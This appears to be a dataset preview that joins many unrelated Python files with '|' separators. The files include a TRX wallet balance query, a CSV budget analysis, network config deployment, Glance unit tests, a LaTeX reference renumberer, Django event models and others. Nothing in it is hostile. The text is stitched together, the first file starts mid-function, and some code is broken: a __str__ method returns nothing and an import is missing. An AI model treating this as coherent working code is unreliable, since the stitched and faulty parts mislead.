logging.info(f"{addr}'s balance({fmtBalance}) is less than 1.0TRX, skip it.")
continue
retList.append({'address': addr, 'balance': str(fmtBalance) , 'symbol' : symbol})
return retList
def post(self):
try:
# symbol = self.get_argument('symbol')
# if str(symbol) not in ['TRX', 'TRC20-USDT']:
# raise Exception("invalid symbol")
retdata = self.process(symbol='TRX')
self.write(json.dumps(BaseHandler.success_ret_with_data(retdata), default=decimal_default))
pass
except Exception as e:
self.write(json.dumps(BaseHandler.error_ret_with_data("error: %s" % e)))
logging.error(" TRX_CollectionQuery error:{0} in {1}".format(e, get_linenumber()))
def get(self):
self.post()
|
#!/usr/bin/env python3
"""
Author : Dawei Zhang <davyzhang325@gmail.com>
Date : 2021-06-22
Purpose: Rock the Casbah
"""
import argparse
# --------------------------------------------------
def get_args():
"""Get command-line arguments"""
parser = argparse.ArgumentParser(
description='Jump the Five',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('text',
metavar='str',
help='Input text')
return parser.parse_args()
# --------------------------------------------------
def main():
"""Make a jazz noise here"""
args = get_args()
jumper = {'1': '9', '2': '8', '3': '7', '4': '6', '5': '0',
'6': '4', '7': '3', '8': '2', '9': '1', '0': '5'}
for char in args.text:
print(jumper.get(char, char), end='')
print()
# --------------------------------------------------
if __name__ == '__main__':
main()
|
# Import sys
import sys
# Import pathlib and csv
import pathlib
import csv
# Set path for file with pathlib.Path(), pointing to the budget_data.csv file saved in the Resources folder
csvpath = pathlib.Path("./Resources/budget_data.csv")
# Open the CSV using the `with` keyword
with open(csvpath) as csvfile:
# Use csv.reader() to read the csvfile variable, setting the delimiter argument equal to ","
csvreader = csv.reader(csvfile, delimiter=",")
# Read the header row first (skip this step if there is now header)
csv_header = next(csvreader)
# Create a date_set variable to count only the unique dates
date_set = set()
# Setup a loop counter to count the number of rows
row_counter = 0
# Setup a profit/loss counter to count the total amount
total_profit_loss = 0
# Setup the following variables to take care of the monthly profit/losses changes
last_month_amount = 0
amount_change_sum = 0
amount_change = 0
# Set up the maximum increase/decrease variables to calculate the greatest increase in profits and the greatest decrease in losses
max_increase = 0
max_decrease = 0
# Loop through each row in csvreader
for row in csvreader:
# Use if function to count the number of unique months in the dataset
if row[0] not in date_set:
date_set.add(row[0])
row_counter = row_counter + 1
# Add the total amount of profit/loss over the entire period
total_profit_loss = total_profit_loss + int(row[1])
# For monthly amount changes:
if row_counter > 1:
# This is to calculate monthly amount changes
amount_change = int(row[1]) - last_month_amount
# This is to add up the monthly amount changes
amount_change_sum = amount_change_sum + (int(row[1]) - last_month_amount)
# To calculate max increase/decrease
if amount_change > max_increase:
max_increase = amount_change
max_increase_date = str(row[0])
if amount_change < max_decrease:
max_decrease = amount_change
max_decrease_date = str(row[0])
# The last_month_amount will automatically be updated to the most recent "last month" in every for loop
last_month_amount = int(row[1])
# Analysis Output
sys.stdout = open("./analysis/analysis.txt", "w")
print("PyBank Financial Analysis")
print("-------------------------")
print(f"Total Months: {row_counter}")
print(f"Total Profits/Losses: ${total_profit_loss}")
print(f"Average Change: ${round(amount_change_sum / (row_counter - 1), 2)}")
print(f"Greatest Increase in Profits: {max_increase_date} (${round(max_increase)})")
print(f"Greatest Decrease in Losses: {max_decrease_date} (${round(max_decrease)})")
sys.stdout.close() |
import fitsio
from FitsIngest import FitsIngest
class Extinction(FitsIngest):
def __init__(self, datafile, idDict, filetype, dbh):
""" Class to ingest exctintion_ebv and extinction_band data
"""
FitsIngest.__init__(self, filetype, datafile, idDict, dbh=dbh)
self.constants = {
"FILENAME": self.shortfilename,
}
if filetype != 'coadd_extinct_ebv':
self.header = fitsio.read_header(datafile, self.dbDict[self.objhdu]['BAND'].hdu)
band = self.header['BAND'].strip()
self.constants["BAND"] = band
|
"""
In this example we write a CLI tool with brigade and click to deploy configuration.
"""
import logging
from brigade.core import Brigade
from brigade.plugins.inventory.simple import SimpleInventory
from brigade.plugins.tasks import data, networking, text
import click
def base_config(task):
"""
1. logs all the facts, even the ones inherited from groups
2. Creates a placeholder for device configuration
3. Initializes some basic configuration
"""
logging.info({task.host.name: task.host.items()})
task.host["config"] = ""
r = text.template_file(task=task,
template="base.j2",
path="templates/base/{nos}")
task.host["config"] += r["result"]
def configure_interfaces(task):
"""
1. Load interface data from an external yaml file
2. Creates interface configuration
"""
r = data.load_yaml(task=task,
file="extra_data/{host}/interfaces.yaml")
task.host["interfaces"] = r["result"]
r = text.template_file(task=task,
template="interfaces.j2",
path="templates/interfaces/{nos}")
task.host["config"] += r["result"]
def deploy_config(task):
"""
1. Load configuration into the device
2. Prints diff
"""
r = networking.napalm_configure(task=task,
replace=False,
configuration=task.host["config"])
click.secho("--- {} ({})".format(task.host, r.changed), fg="blue", bold=True)
click.secho(r.diff, fg='yellow')
click.echo()
@click.command()
@click.option('--commit/--no-commit', default=False)
@click.option('--debug/--no-debug', default=False)
@click.argument('site')
@click.argument('role')
def deploy(commit, debug, site, role):
logging.basicConfig(
filename="log",
level=logging.DEBUG if debug else logging.INFO,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
)
brigade = Brigade(
inventory=SimpleInventory("hosts.yaml", "groups.yaml"),
dry_run=not commit,
)
filtered = brigade.filter(site=site, role=role)
filtered.run(task=base_config)
filtered.run(task=configure_interfaces)
filtered.run(task=deploy_config)
if __name__ == "__main__":
deploy()
|
from typing import Any
from unittest.mock import MagicMock
from pandas import DataFrame
from dagster import IOManager, io_manager
def create_db_connection() -> Any:
return MagicMock()
def train_recommender_model(df: DataFrame) -> Any:
del df
def pickle_to_s3(object: Any, key: str) -> None:
pass
def fetch_products() -> DataFrame:
return DataFrame({"product": ["knive"], "category": ["kitchenware"]})
@io_manager
def snowflake_io_manager():
class SnowflakeIOManager(IOManager):
def handle_output(self, context, obj):
del context
del obj
def load_input(self, context):
return DataFrame()
return SnowflakeIOManager()
@io_manager
def s3_io_manager():
class S3IOManager(IOManager):
def handle_output(self, context, obj):
del context
del obj
def load_input(self, context):
return None
return S3IOManager()
|
import sys, os, re
import pprint
import filecmp
sys.path.append("../src")
import pronlex
import phonecodes
"""This script should be run from the command line, in the test directory.
It will load some pronlexes from the 'fixtures' subdirectory,
test phone code conversion, and test both word and phone searches."""
os.makedirs("outputs", exist_ok=True)
fixtures = [
["isle_eng_sample", ["arpabet", "disc", "xsampa"]],
["babel_amh_sample", ["xsampa"]],
["babel_ben_sample", ["xsampa"]],
["celex_deu_sample", ["disc", "xsampa"]],
["celex_eng_sample", ["arpabet", "disc", "xsampa"]],
["celex_nld_sample", ["disc", "xsampa"]],
["callhome_arz_sample", ["callhome", "xsampa"]],
["callhome_cmn_sample", ["callhome", "xsampa"]],
["callhome_spa_sample", ["callhome", "xsampa"]],
]
p = {}
original = sys.stdout
sys.stdout = open(os.path.join("outputs", "test_pronlex.txt"), "w")
#########################################################################
# Test reading in dictionaries, converting phonecodes, and writing them
for fixture in fixtures:
srcfile = fixture[0]
p[srcfile] = {}
(dtype, lang, rem) = srcfile.split("_")
dict_params = {}
if dtype == "isle":
dict_params["discard_phones"] = "#."
print("Reading %s dict in %s from %s" % (dtype, lang, srcfile))
p[srcfile]["ipa"] = pronlex.read(
os.path.join("fixtures", srcfile) + ".txt", lang, dtype, dict_params
).recode("ipa")
# Convert to each target code, and back again, and check results
for c1 in fixture[1]:
for c in [["ipa", c1], [c1, "ipa"]]:
print("##########################################################")
print("# Testing %s[%s].recode(%s)" % (srcfile, c[0], c[1]))
p[srcfile][c[1]] = p[srcfile][c[0]].recode(c[1])
destfile = re.sub(r"sample", c[1], srcfile)
print("%s -> %s" % (srcfile, destfile))
p[srcfile][c[1]].save(os.path.join("outputs", destfile) + ".txt")
with open(os.path.join("fixtures", destfile) + ".txt") as f:
flines = f.readlines()
flines.append("-----\n")
with open(os.path.join("outputs", destfile) + ".txt") as f:
olines = f.readlines()
olines.append("-----\n")
if flines == olines:
print("Pass")
else:
print("".join(["FAIL\n"] + flines + olines))
####################################################################
# Test looking up words
from sentences import sents
slists = {
L: {c: [p for p in S.split(" ")] for (c, S) in D.items()}
for (L, D) in sents.items()
}
for fixture in fixtures:
srcfile = fixture[0]
(dtype, lang, rem) = srcfile.split("_")
for c1 in ["ipa"] + fixture[1]:
# Test words2phones
print("##########################################################")
print("# Testing words2phones(%s,%s)" % (srcfile, c1))
res = p[srcfile][c1].words2phones(slists[lang]["word"])
pat = re.compile(" ".join(slists[lang][c1]), re.IGNORECASE)
if res == slists[lang][c1]:
print("Pass")
else:
print("FAIL")
m = min(len(res), len(slists[lang][c1]))
for n in range(0, m):
if slists[lang][c1][n] == res[n]:
print("%s == %s" % (res[n], slists[lang][c1][n]))
else:
print("%s != %s" % (res[n], slists[lang][c1][n]))
if len(slists[lang][c1]) > m:
print("Ref chars not in hyp:" + ":".join(slists[lang][c1][m:]))
elif len(res) > m:
print("Hyp chars not in ref:" + ":".join(res[m:]))
# Test phones2words
print("##########################################################")
print("# Testing phones2words(%s,%s)" % (srcfile, c1))
res = p[srcfile][c1].phones2words(slists[lang][c1])
pat = re.compile(" ".join(slists[lang]["word"]), re.IGNORECASE)
if any(re.match(pat, " ".join(x)) for x in res[0]):
print("Pass")
else:
print("FAIL")
print("Target:" + ":".join(slists[lang]["word"]))
print("Results:[" + "][".join([":".join(x) for x in res]) + "]")
# Test phones2words with 1 or 2 phone distance allowed
print("\n##########################################################")
print("# Testing phones2words(isle_eng_sample) with dist==2")
srcfile = "isle_eng_sample"
lang = "eng"
c1 = "ipa"
res = p[srcfile][c1].phones2words(slists[lang][c1], 2)
for d in sorted(res.keys()):
print("### Candidates with string edit distance == %d" % (d))
for c in res[d]:
print(" ".join(c))
|
# Copyright 2018 NTT DATA, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import os
import glance_store
from oslo_config import cfg
import glance.async.flows.plugins.inject_image_metadata as inject_metadata
from glance.common import utils
from glance import domain
from glance import gateway
from glance.tests.unit import utils as test_unit_utils
import glance.tests.utils as test_utils
CONF = cfg.CONF
UUID1 = 'c80a1a6c-bd1f-41c5-90ee-81afedb1d58d'
TENANT1 = '6838eb7b-6ded-434a-882c-b344c77fe8df'
class TestInjectImageMetadataTask(test_utils.BaseTestCase):
def setUp(self):
super(TestInjectImageMetadataTask, self).setUp()
glance_store.register_opts(CONF)
self.config(default_store='file',
stores=['file', 'http'],
filesystem_store_datadir=self.test_dir,
group="glance_store")
glance_store.create_stores(CONF)
self.work_dir = os.path.join(self.test_dir, 'work_dir')
utils.safe_mkdirs(self.work_dir)
self.config(work_dir=self.work_dir, group='task')
self.context = mock.MagicMock()
self.img_repo = mock.MagicMock()
self.task_repo = mock.MagicMock()
self.image_id = mock.MagicMock()
self.gateway = gateway.Gateway()
self.task_factory = domain.TaskFactory()
self.img_factory = self.gateway.get_image_factory(self.context)
self.image = self.img_factory.new_image(image_id=UUID1,
disk_format='qcow2',
container_format='bare')
task_input = {
"import_from": "http://cloud.foo/image.qcow2",
"import_from_format": "qcow2",
"image_properties": {'disk_format': 'qcow2',
'container_format': 'bare'}
}
task_ttl = CONF.task.task_time_to_live
self.task_type = 'import'
self.task = self.task_factory.new_task(self.task_type, TENANT1,
task_time_to_live=task_ttl,
task_input=task_input)
def test_inject_image_metadata_using_non_admin_user(self):
context = test_unit_utils.get_fake_context(roles='member')
inject_image_metadata = inject_metadata._InjectMetadataProperties(
context, self.task.task_id, self.task_type, self.img_repo,
self.image_id)
self.config(inject={"test": "abc"},
group='inject_metadata_properties')
with mock.patch.object(self.img_repo, 'get') as get_mock:
image = mock.MagicMock(image_id=self.image_id,
extra_properties={"test": "abc"})
get_mock.return_value = image
with mock.patch.object(self.img_repo, 'save') as save_mock:
inject_image_metadata.execute()
get_mock.assert_called_once_with(self.image_id)
save_mock.assert_called_once_with(image)
self.assertEqual({"test": "abc"}, image.extra_properties)
def test_inject_image_metadata_using_admin_user(self):
context = test_unit_utils.get_fake_context(roles='admin')
inject_image_metadata = inject_metadata._InjectMetadataProperties(
context, self.task.task_id, self.task_type, self.img_repo,
self.image_id)
self.config(inject={"test": "abc"},
group='inject_metadata_properties')
inject_image_metadata.execute()
with mock.patch.object(self.img_repo, 'get') as get_mock:
get_mock.assert_not_called()
with mock.patch.object(self.img_repo, 'save') as save_mock:
save_mock.assert_not_called()
def test_inject_image_metadata_empty(self):
context = test_unit_utils.get_fake_context(roles='member')
inject_image_metadata = inject_metadata._InjectMetadataProperties(
context, self.task.task_id, self.task_type, self.img_repo,
self.image_id)
self.config(inject={}, group='inject_metadata_properties')
inject_image_metadata.execute()
with mock.patch.object(self.img_repo, 'get') as get_mock:
get_mock.assert_not_called()
with mock.patch.object(self.img_repo, 'save') as save_mock:
save_mock.assert_not_called()
|
#!/usr/bin/env python3
# pytexnumber.py
#
# Renumbers LaTeX references
#
# Type python3 pytexnumber.py --help for help
# Copyright (c) 2013 - 2021 Vlad Gheorghiu. All rights reserved.
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import argparse
import re
import sys
# builds the labels dictionary
def build_labels(input_file, pattern_in, ignore_comments):
count = 0 # number of distinct labels in the dictionary
dictionary = {} # this is the label dictionary
warnings = [] # duplicate labels warning
for line_no, cur_line in enumerate(input_file, start=1):
if ignore_comments is True:
cur_line = cur_line.split('%')[0]
# search for \label{pattern...} in the current line
for labels in re.finditer('\\\\label{'
+ pattern_in + '.*?}', cur_line):
# extract {pattern...} from \label{pattern...}
label = re.search('{.*?}', labels.group()).group()
# insert the UNIQUE label {pattern...} into the label dictionary
if label not in dictionary:
count += 1
dictionary[label] = count
else:
col_no = labels.start() + 1 # the warning's column number
warnings.append(['\\label' + label, line_no, col_no])
input_file.seek(0) # go back to the beginning of the file
return [dictionary, warnings]
# replaces all matching references in the current line (up to comments if comments are ignored)
def replace_refs_in_line(keywords, pattern_in, pattern_out,
dictionary, line, line_idx, ignore_comments):
warnings = [] # undefined reference(s) warning(s) in (the current line)
line_no_comments = line
comment = ""
if ignore_comments is True:
line_split = line.split('%', 1)
line_no_comments = line_split[0]
if len(line_split) > 1: # we have a comment
comment = '%' + line_split[1]
for keyword in keywords:
for matches in re.finditer('\\\\' + keyword +
'{' + pattern_in + '.*?}', line_no_comments):
# extract {pattern...} from \<keyword>{pattern...}
match = re.search('{.*?}', matches.group()).group()
# do the replacement whenever the {pattern...} is different
# from the dictionary key
if match not in dictionary:
# undefined reference
col_no = matches.start() + 1 # the warning's column number
warnings.append(['\\' + keyword + match, line_idx, col_no])
if (match in dictionary and
('{' + pattern_out + str(dictionary[match]) + '}') != match):
line_no_comments = re.sub(keyword + match,
keyword + '_REPLACED_mark'
+ '{' + pattern_out +
str(dictionary[match]) + '}', line_no_comments)
line_no_comments = re.sub(keyword + '_REPLACED_mark', keyword, line_no_comments)
return [line_no_comments + comment, warnings]
# main program
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description='Renumbers LaTeX equations.'
'The program reads from the standard input and writes to the standard output.')
parser.add_argument('pattern', nargs='?', help='input pattern, e.g., "eqn"')
parser.add_argument('replacement', nargs='?', help='replacement pattern, e.g., "Eqn"')
parser.add_argument('--ignore-comments', dest='comments', action='store_true',
help='ignore comments, true by default')
parser.add_argument('--no-ignore-comments', dest='comments', action='store_false',
help='do not ignore comments, false by default')
parser.set_defaults(comments=True)
parser.add_argument('--log', help='log file')
args = parser.parse_args()
pattern = args.pattern # pattern to replace
replacement = args.replacement # replacement
ignore_comments = args.comments # ignore LaTeX comments
keywords = ['label', 'eqref', 'ref', 'pageref'] # modify as needed
try:
# process the stream
with sys.stdin as f_in, sys.stdout as f_out:
# create the label dictionary
[label_dictionary, label_warnings] = build_labels(f_in, pattern, ignore_comments)
# replace all matching references line by line
modified_lines = [] # list with the lines that are modified
distinct_label_modifications = 0 # count modified \label{pattern...}
reference_warnings = [] # reference warnings
for line_index, current_line in enumerate(f_in, start=1):
[modified_line, warnings] = \
replace_refs_in_line(keywords, pattern, replacement, label_dictionary,
current_line, line_index, ignore_comments)
if modified_line != current_line: # the line was modified
modified_lines += [line_index]
if warnings: # append reference warning(s) from the current line
reference_warnings += warnings
f_out.write(modified_line)
# display warnings
original_stdout = sys.stdout
sys.stdout = sys.stderr
if label_warnings or reference_warnings:
if reference_warnings:
print('PARSING WARNING: Undefined references')
for [item, row, col] in reference_warnings:
print(item + ', ' + str(row) + ':' + str(col))
if label_warnings:
print('PARSING WARNING: Duplicate labels')
for [item, row, col] in label_warnings:
print(item + ', ' + str(row) + ':' + str(col))
sys.stdout = original_stdout
# write to log file (if any)
if args.log is not None:
try:
with open(args.log, 'w') as logfile:
original_stdout = sys.stdout # Save a reference to the original standard output
sys.stdout = logfile
# replacements
for item in sorted(label_dictionary, key=label_dictionary.get):
item_no_accolades = item
remove = ['{', '}']
for c in remove:
item_no_accolades = item_no_accolades.replace(c, '')
print(item_no_accolades + ' -> ' + replacement + str(label_dictionary[item]))
except IOError as err:
print(str(err))
except IOError as err:
print(str(err))
|
#!/usr/bin/env python
#coding: utf-8
class Solution:
# @param A, a list of integers
# @return an integer
def trap(self, A):
left, right = 0, len(A) - 1
total, block = 0, 0
curlevel = 0
while left <= right:
curmin = min(A[left], A[right])
if curmin > curlevel:
total += (curmin - curlevel) * (right - left + 1)
curlevel = curmin
if A[left] < A[right]:
block += A[left]
left += 1
else:
block += A[right]
right -= 1
return total - block
if __name__ == '__main__':
s = Solution()
assert 6 == s.trap([0,1,0,2,1,0,1,3,2,1,2,1])
|
from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.utils import timezone
from imagekit.models import ImageSpecField
from imagekit.processors import ResizeToFill
from ..utils import slugify
from .locale import *
from .profiles import *
from .events import *
from .search import *
from .. import location
import pytz
import datetime
class Speaker(models.Model):
user = models.ForeignKey(UserProfile, on_delete=models.CASCADE)
avatar = ProcessedImageField(verbose_name=_("Photo Image"),
upload_to='avatars',
processors=[ResizeToFill(128, 128)],
format='PNG',
blank=True)
title = models.CharField(max_length=256, blank=True, null=True)
bio = models.TextField(verbose_name=_('Biography'), blank=True)
categories = models.ManyToManyField('Category', blank=True)
topics = models.ManyToManyField('Topic', blank=True)
def headshot(self):
if self.avatar:
return self.avatar
else:
return self.user.avatar
def headshot_url(self):
if self.avatar is not None and self.avatar.name is not None and self.avatar.name != '':
return self.avatar.url
else:
return self.user.avatar_url()
def __str__(self):
if self.title is not None and self.title != '':
return '%s, %s' % (self.user, self.title)
else:
return str(self.user)
class Talk(models.Model):
PRESENTATION=0
WORKSHOP=1
PANEL=2
ROUNDTABLE=3
QANDA=4
DEMO=5
TYPES = [
(PRESENTATION, _("Presentation")),
(WORKSHOP, _("Workshop")),
(PANEL, _("Panel")),
(ROUNDTABLE, _("Roundtable")),
(QANDA, _("Q & A")),
(DEMO, _("Demonstration")),
]
speaker = models.ForeignKey(Speaker, verbose_name=_('Speaker Bio'), related_name='talks', on_delete=models.CASCADE)
title = models.CharField(max_length=256)
abstract = models.TextField()
talk_type = models.SmallIntegerField(_("Type"), choices=TYPES, default=PRESENTATION)
web_url = models.URLField(_("Website"), null=True, blank=True)
category = models.ForeignKey('Category', on_delete=models.SET_NULL, blank=False, null=True)
topics = models.ManyToManyField('Topic', blank=True)
@property
def future_presentations(self):
return self.presentations.filter(status__gte=0, event__start_time__gt=timezone.now())
@property
def past_presentations(self):
return self.presentations.filter(status=1, event__start_time__lte=timezone.now())
def __str__(self):
self.title
class SpeakerRequest(models.Model):
event = models.ForeignKey(Event, on_delete=models.CASCADE)
topics = models.ManyToManyField('Topic', blank=True)
class Presentation(models.Model):
DECLINED=-1
PROPOSED=0
ACCEPTED=1
STATUSES = [
(DECLINED, _("Declined")),
(PROPOSED, _("Proposed")),
(ACCEPTED, _("Accepted")),
]
event = models.ForeignKey(Event, related_name='presentations', on_delete=models.CASCADE)
talk = models.ForeignKey(Talk, related_name='presentations', on_delete=models.CASCADE, blank=False, null=True)
status = models.SmallIntegerField(choices=STATUSES, default=PROPOSED, db_index=True)
start_time = models.DateTimeField(verbose_name=_('Start Time'), db_index=True, null=True, blank=True)
created_by = models.ForeignKey(UserProfile, on_delete=models.SET_NULL, null=True, blank=False)
created_time = models.DateTimeField(default=timezone.now, db_index=True)
def __str__(self):
try:
return '%s at %s' % (self.talk.title, self.event.name)
except:
return _("No talk")
|
"""This example is testing domain adaptation for action recognition, using PyTorch Lightning.
We can load and test different trained models without training.
"""
import argparse
import logging
import pytorch_lightning as pl
import torch
from config import get_cfg_defaults
from model import get_model
from kale.loaddata.video_access import VideoDataset
from kale.loaddata.video_multi_domain import VideoMultiDomainDatasets
def arg_parse():
"""Parsing arguments"""
parser = argparse.ArgumentParser(description="Domain Adversarial Networks on Action Datasets")
parser.add_argument("--cfg", required=True, help="path to config file", type=str)
parser.add_argument("--gpus", default="0", help="gpu id(s) to use", type=str)
parser.add_argument("--resume", default="", type=str)
parser.add_argument("--ckpt", default="", help="pre-trained parameters for the model (ckpt files)", type=str)
args = parser.parse_args()
return args
def weights_update(model, checkpoint):
"""Load the pre-trained parameters to the model."""
model_dict = model.state_dict()
pretrained_dict = {k: v for k, v in checkpoint["state_dict"].items() if k in model_dict}
model_dict.update(pretrained_dict)
model.load_state_dict(model_dict)
return model
def main():
"""The main for this domain adaptation example, showing the workflow"""
args = arg_parse()
# ---- setup configs ----
cfg = get_cfg_defaults()
cfg.merge_from_file(args.cfg)
cfg.freeze()
print(cfg)
# ---- setup output ----
format_str = "@%(asctime)s %(name)s [%(levelname)s] - (%(message)s)"
logging.basicConfig(format=format_str)
# ---- setup dataset ----
seed = cfg.SOLVER.SEED
source, target, num_classes = VideoDataset.get_source_target(
VideoDataset(cfg.DATASET.SOURCE.upper()), VideoDataset(cfg.DATASET.TARGET.upper()), seed, cfg
)
dataset = VideoMultiDomainDatasets(
source,
target,
image_modality=cfg.DATASET.IMAGE_MODALITY,
seed=seed,
config_weight_type=cfg.DATASET.WEIGHT_TYPE,
config_size_type=cfg.DATASET.SIZE_TYPE,
)
# ---- setup model and logger ----
model, train_params = get_model(cfg, dataset, num_classes)
trainer = pl.Trainer(
# progress_bar_refresh_rate=cfg.OUTPUT.PB_FRESH, # in steps
logger=False,
resume_from_checkpoint=args.ckpt,
gpus=args.gpus,
)
model_test = weights_update(model=model, checkpoint=torch.load(args.ckpt))
# test scores
trainer.test(model=model_test)
if __name__ == "__main__":
main()
|
import os
import sys
from common import (QtToolModuleNotFoundError, catch_known_errors,
is_installed, remove_vendor_suffix)
def run():
sys.argv[0] = remove_vendor_suffix(sys.argv[0])
# lupdate-pyside6 is deprecated can have bug:
# https://bugreports.qt.io/browse/PYSIDE-1376?focusedCommentId=562463&page=com.atlassian.jira.plugin.system.issuetabpanels%3Acomment-tabpanel#comment-562463
# if is_installed('PySide6'):
# from PySide6.scripts.pyside_tool import main
if is_installed('PyQt6'):
from PyQt6.lupdate.pylupdate import main
elif is_installed('PySide2'):
from PySide2.scripts.pyside_tool import main
sys.argv[0] = os.path.join(
os.path.dirname(sys.argv[0]),
f'pyside2-{os.path.basename(sys.argv[0])}'
)
elif is_installed('PyQt5'):
from PyQt5.pylupdate_main import main
else:
raise QtToolModuleNotFoundError('lupdate')
sys.exit(main())
if __name__ == '__main__':
catch_known_errors(run)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.